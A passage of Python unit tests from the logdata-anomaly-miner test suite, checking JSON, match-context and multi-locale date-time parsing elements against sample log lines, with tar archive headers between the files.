self.assertEqual(b"foobar", match_element.children[1].get_match_object()) self.assertEqual(b"/index.html", match_element.children[2].get_match_object()) def test4ignore_null(self): """Parses a json-file with ignore_null and compares if the configured ModelElements are parsed properly""" host = DummyFixedDataModelElement("host", b"www.google.com") user = DummyFixedDataModelElement("user", b"foobar") key_parser_dict = { "host": host, "user": user } # Set ignore_null to True and strict to False json_model_element = JsonStringModelElement(self.id_, key_parser_dict, False, True) # Set user to null data = b'{"host": "www.google.com", "user": null, "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed but without "user": self.assertEqual(1, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) # set ignore_null to False and strict to False json_model_element = JsonStringModelElement(self.id_, key_parser_dict, False, False) # Set user to null data = b'{"host": "www.google.com", "user": null, "one": "two"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # expect an unparsed line self.assertEqual(None,match_element) # set example user to empty string user = DummyFixedDataModelElement("user", b"") key_parser_dict2 = { "host": host, "user": user } # Set ignore_null to False in order to pass b"" to the subparser. Strict is False json_model_element = JsonStringModelElement(self.id_, key_parser_dict2, False, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed: self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"", match_element.children[1].get_match_object()) # Set ignore_null to True and strict to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, True) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed but without "user": self.assertEqual(1, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) # set ignore_null to False and strict to True json_model_element = JsonStringModelElement(self.id_, key_parser_dict, True, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # expect an unparsed line self.assertEqual(None,match_element) # set example user to empty string user = DummyFixedDataModelElement("user", b"") key_parser_dict2 = { "host": host, "user": user } # Set ignore_null to False in order to pass b"" to the subparser. Strict is True json_model_element = JsonStringModelElement(self.id_, key_parser_dict2, True, False) # Set user to null data = b'{"host": "www.google.com", "user": null}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) # Line must be parsed: self.assertEqual(2, len(match_element.children)) self.assertEqual(b"www.google.com", match_element.children[0].get_match_object()) self.assertEqual(b"", match_element.children[1].get_match_object()) class JsonAccessObjectTest(TestBase): def test1get_id(self): """Parses a dictionary and see if everything is flattened properly""" d = {'a': 'b', 'c': {'w': 'g', 'rata': 'mahatta', 'tic': {'tac': 'toe'}, 'brat': ['worst','wuast',{'key': ['wurst','fleisch'], 'food': 'veggie'},'blues'],'bist': 'narrisch'}, 'foo': 'bar'} """ a: b c.w: g c.rata: mahatta c.tic.tac: toe c.brat[0]: worst c.brat[1]: wuast c.brat[2].key[0]: wurst c.brat[2].key[1]: fleisch c.brat[2].food: veggie c.brat[3]: blues foo: bar """ jao = JsonAccessObject(d) self.assertTrue(jao.collection['a']) self.assertTrue(jao.collection['c.w']) self.assertTrue(jao.collection['c.rata']) self.assertTrue(jao.collection['c.tic.tac']) self.assertTrue(jao.collection['c.brat[0]']) self.assertTrue(jao.collection['c.brat[1]']) self.assertTrue(jao.collection['c.brat[2].key[0]']) self.assertTrue(jao.collection['c.brat[2].key[1]']) self.assertTrue(jao.collection['c.brat[2].food']) self.assertTrue(jao.collection['c.brat[3]']) self.assertTrue(jao.collection['c.bist']) self.assertTrue(jao.collection['foo']) self.assertEqual(12,len(jao.collection)) self.assertEqual("b",jao.collection["a"]["value"]) self.assertEqual("g",jao.collection["c.w"]["value"]) self.assertEqual("mahatta",jao.collection["c.rata"]["value"]) self.assertEqual("toe",jao.collection["c.tic.tac"]["value"]) self.assertEqual("worst",jao.collection["c.brat[0]"]["value"]) self.assertEqual("wuast",jao.collection["c.brat[1]"]["value"]) self.assertEqual("wurst",jao.collection["c.brat[2].key[0]"]["value"]) self.assertEqual("fleisch",jao.collection["c.brat[2].key[1]"]["value"]) self.assertEqual("veggie",jao.collection["c.brat[2].food"]["value"]) self.assertEqual("blues",jao.collection["c.brat[3]"]["value"]) self.assertEqual("bar",jao.collection["foo"]["value"]) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/MatchContextTest.py000066400000000000000000000121101437606560100272350ustar00rootroot00000000000000import unittest from aminer.parsing.MatchContext import MatchContext, DebugMatchContext from unit.TestBase import TestBase class MatchContextTest(TestBase): """Unittests for the MatchContext and DebugMatchContext.""" def test1update_successful(self): """Update the MatchContext and DebugMatchContext with allowed values.""" data = b"this is an example of a log line." match_context = MatchContext(data) match_context.update(b"this is an example") self.assertEqual(match_context.match_data, b" of a log line.") match_context = MatchContext(data) match_context.update([b"t", b"h", b"i", b"s"]) self.assertEqual(match_context.match_data, b" is an example of a log line.") match_context = MatchContext(data) match_context.update(b"some other text") self.assertEqual(match_context.match_data, b"ple of a log line.") match_context = DebugMatchContext(data) match_context.update(b"this is an example ") self.assertEqual(match_context.match_data, b"of a log line.") self.assertEqual(match_context.get_debug_info(), 'Starting match update on "this is an example of a log line."\n Removed: "this is an example ", remaining 14' ' bytes\n Shortest unmatched data: "of a log line."\n') self.assertEqual(match_context.get_debug_info(), ' Shortest unmatched data: "of a log line."\n') match_context.update(b"of") self.assertEqual(match_context.get_debug_info(), ' Removed: "of", remaining 12 bytes\n Shortest unmatched data: " a log line."\n') match_context.update(b" a log line.") self.assertEqual(match_context.get_debug_info(), ' Removed: " a log line.", remaining 0 bytes\n Shortest unmatched data: ""\n') self.assertRaises(ValueError, match_context.update, b" a log line.") self.assertEqual( match_context.get_debug_info(), ' Current data does not start with " a log line."\n Shortest unmatched data: ""\n') match_context.update(b"") def test2update_fail(self): """Update the DebugMatchContext with not allowed values.""" match_context = DebugMatchContext(b"this is an example of a log line.") self.assertRaises(TypeError, match_context.update, "this is an example") self.assertRaises(TypeError, match_context.update, [b"t", b"h", b"i", b"s"]) self.assertRaises(ValueError, match_context.update, b"some other text") def test3_match_context_init_input_validation(self): """Check if input is validated for MatchContext.__init__().""" self.assertRaises(TypeError, MatchContext, None) self.assertRaises(TypeError, MatchContext, "path") self.assertRaises(TypeError, MatchContext, True) self.assertRaises(TypeError, MatchContext, 123) self.assertRaises(TypeError, MatchContext, 123.22) self.assertRaises(TypeError, MatchContext, {"id": "path"}) self.assertRaises(TypeError, MatchContext, ["path"]) self.assertRaises(TypeError, MatchContext, []) self.assertRaises(TypeError, MatchContext, ()) self.assertRaises(TypeError, MatchContext, set()) def test4_match_context_update_input_validation(self): """Check if MatchContext.update() fails if len(match_string) does not work.""" data = b"this is an example of a log line." match_context = MatchContext(data) self.assertRaises(TypeError, match_context.update, None) self.assertRaises(TypeError, match_context.update, True) self.assertRaises(TypeError, match_context.update, 123) self.assertRaises(TypeError, match_context.update, 123.22) self.assertRaises(TypeError, match_context.update, match_context) def test5_debug_match_context_init_input_validation(self): """Check if input is validated for DebugMatchContext.__init__().""" self.assertRaises(TypeError, DebugMatchContext, None) self.assertRaises(TypeError, DebugMatchContext, "path") self.assertRaises(TypeError, DebugMatchContext, True) self.assertRaises(TypeError, DebugMatchContext, 123) self.assertRaises(TypeError, DebugMatchContext, 123.22) self.assertRaises(TypeError, DebugMatchContext, True) self.assertRaises(TypeError, DebugMatchContext, {"id": "path"}) self.assertRaises(TypeError, DebugMatchContext, ["path"]) self.assertRaises(TypeError, DebugMatchContext, []) self.assertRaises(TypeError, DebugMatchContext, ()) self.assertRaises(TypeError, DebugMatchContext, set()) def test6_debug_match_context_update_input_validation(self): """Check if input is validated for DebugMatchContext.update().""" data = b"this is an example of a log line." match_context = MatchContext(data) self.assertRaises(TypeError, match_context.update, None) self.assertRaises(TypeError, match_context.update, True) self.assertRaises(TypeError, match_context.update, 123) self.assertRaises(TypeError, match_context.update, 123.22) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/MatchElementTest.py000066400000000000000000000227601437606560100272160ustar00rootroot00000000000000import unittest from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class MatchElementTest(TestBase): """Unittests for the MatchElement.""" path = "path" match_string = b"12.5" match_object = 12.5 def test1get_path(self): """Test if get_path works properly.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_path(), self.path) def test2get_match_string(self): """Test if get_match_string returns None.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_match_string(), self.match_string) def test3get_match_object(self): """Test if get_match_string returns None.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_match_object(), self.match_object) def test4get_children(self): """Test if get_match_string returns None.""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertEqual(match_element.get_children(), None) def test5annotate_match(self): """This test case checks if all possible annotations are created correctly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.annotate_match(None), "root: root a1: a1 a2: a2 a3: a3 b1: b1 b2: b2 b3: b3") self.assertEqual(root_element.annotate_match(""), "root: root\n a1: a1\n a2: a2\n a3: a3\n b1: b1\n b2: b2\n " "b3: b3") self.assertEqual(root_element.annotate_match("--"), "--root: root\n-- a1: a1\n-- a2: a2\n-- a3: a3\n-- b1: b1\n" "-- b2: b2\n-- b3: b3") def test6serialize_object(self): """This test case checks if all child objects are serialized correctly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.serialize_object(), {"path": "root", "match_object": b"root", "match_string": b"root", "children": [ {"path": "a1", "match_object": b"a1", "match_string": b"a1", "children": [ {"path": "a2", "match_object": b"a2", "match_string": b"a2", "children": [{"path": "a3", "match_object": b"a3", "match_string": b"a3", "children": []}]}]}, {"path": "b1", "match_object": b"b1", "match_string": b"b1", "children": [ {"path": "b2", "match_object": b"b2", "match_string": b"b2", "children": [{"path": "b3", "match_object": b"b3", "match_string": b"b3", "children": []}]}]}]}) def test7str(self): """Test the string representation of the MatchElements.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) self.assertEqual(root_element.__str__(), "MatchElement: path = root, string = root, object = root, children = 2") root_element = MatchElement("match", b"string", 2, None) self.assertEqual(root_element.__str__(), "MatchElement: path = match, string = string, object = 2, children = 0") def test8init_path_input_validation(self): """Check if path is validated in __init__().""" self.assertRaises(TypeError, MatchElement, b"path", self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, True, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, 123, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, 123.22, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, {"id": "path"}, self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, ["path"], self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, [], self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, (), self.match_string, self.match_object, None) self.assertRaises(TypeError, MatchElement, set(), self.match_string, self.match_object, None) def test9init_match_string_input_validation(self): """Check if match_string is validated in __init__().""" self.assertRaises(TypeError, MatchElement, self.path, "path", self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, True, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, 123, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, 123.22, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, {"id": "path"}, self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, ["path"], self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, [], self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, (), self.match_object, None) self.assertRaises(TypeError, MatchElement, self.path, set(), self.match_object, None) def test10init_match_object_input_validation(self): """Check if match_object is validated in __init__().""" MatchElement(self.path, self.match_string, b"", None) MatchElement(self.path, self.match_string, "path", None) MatchElement(self.path, self.match_string, True, None) MatchElement(self.path, self.match_string, 123, None) MatchElement(self.path, self.match_string, 123.22, None) MatchElement(self.path, self.match_string, {"id": "path"}, None) MatchElement(self.path, self.match_string, ["path"], None) MatchElement(self.path, self.match_string, [], None) MatchElement(self.path, self.match_string, (), None) MatchElement(self.path, self.match_string, set(), None) MatchElement(self.path, self.match_string, MatchElement(self.path, self.match_string, self.match_object, None), None) def test11init_children_input_validation(self): """Check if children is validated in __init__().""" self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, b"path") self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, "path") self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, True) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, 123) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, 123.22) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, {"id": "path"}) self.assertRaises(ValueError, MatchElement, self.path, self.match_string, self.match_object, []) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, ()) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, set()) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, ["string"]) self.assertRaises(TypeError, MatchElement, self.path, self.match_string, self.match_object, [b"string"]) def test12init_child_elements_with_no_path(self): """This test case checks, whether an exception is raised, when the path is None and children are passed.""" self.assertRaises(ValueError, MatchElement, None, self.match_string, self.match_object, [ MatchElement(self.path, self.match_string, self.match_object, None)]) def test13annotate_match_indent_str_input_validation(self): """Check if indent_str is validated in annotate_match().""" match_element = MatchElement(self.path, self.match_string, self.match_object, None) self.assertRaises(TypeError, match_element.annotate_match, b" ") self.assertRaises(TypeError, match_element.annotate_match, [" ", "-"]) self.assertRaises(TypeError, match_element.annotate_match, 123.22) self.assertRaises(TypeError, match_element.annotate_match, {"id": "path"}) self.assertRaises(TypeError, match_element.annotate_match, ["path"]) self.assertRaises(TypeError, match_element.annotate_match, []) self.assertRaises(TypeError, match_element.annotate_match, ()) self.assertRaises(TypeError, match_element.annotate_match, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/MultiLocaleDateTimeModelElementTest.py000066400000000000000000001206301437606560100327650ustar00rootroot00000000000000import unittest import locale import pytz import logging from io import StringIO from pwd import getpwnam from grp import getgrnam from datetime import datetime, timezone from aminer.parsing.DateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers class MultiLocaleDateTimeModelElementTest(TestBase): """ Unittests for the MultiLocaleDateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000). """ id_ = "dtme" path = "path" def test1get_match_element_with_different_date_formats(self): """Test if different date_formats can be used to match data.""" tz_gmt10 = pytz.timezone("Etc/GMT+10") en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)], start_year=2021) # test normal date data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_+"/format1", self.path, date, 1549539600, None) # test leap year date data = b"29.02.2020 11:40:00: it still works" date = b"29.02.2020 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format1", self.path, date, 1582976400, None) # test normal date with T data = b"07.02.2019T11:40:00: it still works" date = b"07.02.2019T11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format3", self.path, date, 1549539600, None) # test normal date with fractions data = b"07.02.2019 11:40:00.123456: it still works" date = b"07.02.2019 11:40:00.123456" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600.123456, None) # test normal date with z data = b"07.02.2019 11:40:00+0000: it still works" date = b"07.02.2019 11:40:00+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format1", self.path, date, 1549539600, None) # test with only date defined data = b"07.02.2019: it still works" date = b"07.02.2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format4", self.path, date, 1549497600, None) # test with only time defined. Here obviously the seconds can not be tested. data = b"11:40:23: it still works" date = b"11:40:23" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results( data, match_element, match_context, self.id_ + "/format6", self.path, date, match_element.match_object, None) data = b"Feb 25 something happened" date = b"Feb 25" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(2021, 2, 25, tzinfo=tz_gmt10) # total_seconds should be in UTC, so the timezones are parsed out. total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=tz_gmt10)).days * 86400 - dtm.utcoffset().total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format7", self.path, date, total_seconds, None) # British date data = b"13 Apr 2019 something happened" date = b"13 Apr 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format8", self.path, date, 1555113600, None) # British date 2 data = b"13th Apr 2019 something happened" date = b"13th Apr 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format9", self.path, date, 1555113600, None) # British date 3 data = b"13/04/2019 something happened" date = b"13/04/2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format10", self.path, date, 1555113600, None) # US date data = b"04-13-2019 something happened" date = b"04-13-2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format11", self.path, date, 1555113600, None) # Austrian date no year - year should already be learnt. # start year has to be 2021, because all other formats have defined years. data = b"13.04. 15:12:54:201 something happened" date = b"13.04. 15:12:54:201" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format12", self.path, date, 1618326774.201, None) multi_locale_dtme.latest_parsed_timestamp = None # Austrian time no date data = b"15:12:54:201 something happened" date = b"15:12:54:201" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(2021, datetime.now().month, datetime.now().day, 15, 12, 54, 201, tzinfo=timezone.utc) # total_seconds should be in UTC, so the timezones are parsed out. delta = (dtm - datetime(1970, 1, 1, tzinfo=dtm.tzinfo)) total_seconds = delta.days * 86400 + delta.seconds + delta.microseconds / 1000 self.compare_match_results(data, match_element, match_context, self.id_ + "/format5", self.path, date, total_seconds, None) def test2wrong_date(self): """Test if wrong input data does not return a match.""" tz_gmt10 = pytz.timezone("Etc/GMT+10") en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%b %d", tz_gmt10, de_at_utf8), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) # wrong day data = b"32.03.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # British date data = b"13 Dezember 2019" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"Date %%d: %d.%m.%Y %H:%M:%S%z", None, None)]) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the MultiLocaleDateTimeModelElement.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1")]) def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" self.assertRaises(locale.Error, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8")]) def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2017) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1486467600, None) multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2020) data = b"29.02 11:40:00: it still works" date = b"29.02 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=2019) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609500000, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)]) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, 